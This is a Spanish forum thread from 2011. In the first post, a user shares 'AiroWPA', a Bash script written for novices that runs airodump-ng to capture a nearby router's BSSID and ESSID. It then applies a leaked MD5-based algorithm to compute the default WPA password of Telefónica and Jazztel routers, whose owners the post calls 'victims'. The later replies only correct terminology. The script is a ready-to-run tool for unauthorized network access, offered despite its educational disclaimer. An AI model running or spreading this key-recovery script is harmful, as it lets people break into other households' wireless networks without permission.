Foro de elhacker.net

Seguridad Informática => Wireless en Linux => Mensaje iniciado por: Afsoon en 6 Febrero 2011, 17:13 pm


Título: AiroWPA
Publicado por: Afsoon en 6 Febrero 2011, 17:13 pm
Hola buenas, como todos estaréis al corriente de que se filtrado el algoritmo de las contraseñas WAP de Telefónica y Jazztel, pues bien, me he descargado el script en Bash, que estaba hecho por a.s.r y lo he editado un poco (Pero el algoritmo esta intacto, solo he editado el paso de variables y he añadido unas cosas) y también le he añadido airodump-ng para que sea mas fácil saber la BSSID de la víctima (lo hice para noveles o para los que no se quieren romper la cabeza). Por último, yo no me hago responsable del uso que se le puede dar a terceros (También tengo el aviso en el script) porque quiero enseñar la facilidad de sacar estas contraseñas ahora (eso se encarga la parte de a.s.r) y si esta automatizado el proceso para saber las cosas necesarios en menos de 1 min ya tienes la contraseña (Esa es mi parte, hay muy poca iteración con el usario). Como el saber es libre, aquí tenéis el script
Código
  1. #/bin/bash/
  2.  
  3. #############################################################################################################################################
  4. # Esta parte del script esta hecho por Afsoon (a excepción del algoritmo que esta implantado por a.s.r), yo no me hago responsable del uso # que se le puede dar a terceros, yo hago esto con fines didácticos, para mostrar la poca seguridad de los routers de Telefónica (WLAN_XXXX) # y Jazztel y con la facilidad que se sacan si el proceso se automatiza .
  5. #############################################################################################################################################
  6.  
  7. #Variable de la interfaz que se deberá de escribir antes de iniciar el script
  8. INTERFAZ=
  9. # Se encarga de preguntar antes del inicio si ha escrito la interfaz para ejecutar airodump para saber la ESSID y BSSID 
  10.  
  11. echo "Antes de ejecutar este script, ustede debe de haber"
  12. echo "abierto el script y escrito en la variable INTERFAZ"
  13. echo "su interfaz que se usará para airodump"
  14. echo "si no lo ha hecho diga no ahora, escriba la interfaz"
  15. echo "y vuelva a abrir el script y diga si"
  16.  
  17. echo "Ha escrito su interfaz [s]i\[n]o"
  18. read opc
  19.  
  20. if [ $opc == "s" ]; then
  21.  
  22. # Esta parte mostrara el airodump para ver la BSSID y ESSID
  23.  
  24. clear
  25. echo "Ahora se usara airodump, para saber la BSSID y ESSID al"
  26. echo "que desea atacar. Usted puede parar el proceso cuando quiera" 
  27. echo "Cuando pare el proceso pasaremos a generar la contraseña"
  28. echo "una vez obtenido los datos necesirarios que se dice a continuación"
  29. echo "Se le abrira Gedit en paralelo a airodump"
  30. echo "y copia el BSSID y ESSID de la víctima"
  31.  
  32. trap 'airodump' INT;
  33. airodump()
  34. {
  35.  
  36. # Ahora ejecuta el script que generara la contraseña pero con unas cuantas variaciones
  37. # en el que hay un paso de variables por teclado
  38. clear
  39. echo CalcWLAN by a.s.r and some edited by Afsoon # NO HE EDITADO EL ALGORITMO
  40.  
  41. echo "Ahora se mostrara lo que debes de escribir"                                                                    
  42.  
  43. echo "Inserte su ESSID"
  44. echo "Por ejemplo WLAN_C58D"
  45.  
  46. read ESSID
  47.  
  48. echo "Inserte el BSSID"
  49. echo "Por ejemplo 64:68:0C:C5:C5:90"
  50.  
  51. read BSSIDS
  52.  
  53. HEAD=$(echo -n "$ESSID" | tr 'a-z' 'A-Z' | cut -d_ -f2)                                              
  54. BSSID=$(echo -n "$BSSIDS" | tr 'a-z' 'A-Z' | tr -d :)                                                 
  55. BSSIDP=$(echo -n "$BSSID" | cut -c-8)                                           
  56. KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)                  
  57.  
  58. echo "La clave es $KEY"
  59. exit
  60.  
  61. }
  62.  
  63. sudo airodump-ng $INTERFAZ
  64. wait 2
  65. gedit &
  66. fi
  67.  
  68. if [ $opc == "n" ]; then
  69. exit
  70. fi
  71.  

El funcionamiento del Script es muy simple:

1- Hace una pregunta para saber si has escrito la interfaz (si no se escribe poco hará el Script)
2- si se dice que si, se le dirá que se usara airodump y gedit, este último para apuntar la BSSID y ESSID y cuando acabe con el proceso se pasará a generar la contraseña
3- Cuando se mata el proceso de airodump y se haya copiado el BSSID y ESSID, se le pedirá que se ingrese los datos correspondientes y ya el algoritmo hace su trabajo y te muestra la contraseña.

Título: Re: AiroWAP
Publicado por: andreselmejor en 6 Febrero 2011, 21:56 pm

Citar
AiroWAP

Citar
algoritmo de las contraseñas WAP de Telefónica y Jazztel

Gracias...¿que es airoWAP? :¬¬ ¿contraseñas WAP?... :silbar:


Título: Re: AiroWAP
Publicado por: Afsoon en 7 Febrero 2011, 16:54 pm
AiroWPA es el nombre que le he puesto a mi script, no es otra cosa y si saca las contraseñas WPA de Telefonica y Jazztel

Título: Re: AiroWAP
Publicado por: ChimoC en 7 Febrero 2011, 18:25 pm
Buenas:

Afsoon, andreselmejor lo que te quiere dar a entender es que sería cifrado WPA y no WAP (el WAP está relacionado con los móviles ¿no?)

Y por otro lado no son WLAN_XX sino WLAN_XXXX

Un saludo

ChimoC

Título: Re: AiroWAP
Publicado por: Afsoon en 8 Febrero 2011, 18:15 pm
Cita de: ChimoC en  7 Febrero 2011, 18:25 pm
Buenas:

Afsoon, andreselmejor lo que te quiere dar a entender es que sería cifrado WPA y no WAP (el WAP está relacionado con los móviles ¿no?)

Y por otro lado no son WLAN_XX sino WLAN_XXXX

Un saludo

ChimoC


Gracias ChimoC no me había dado cuenta, no se que se me ha pasado por la cabeza, siempre me confundo


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines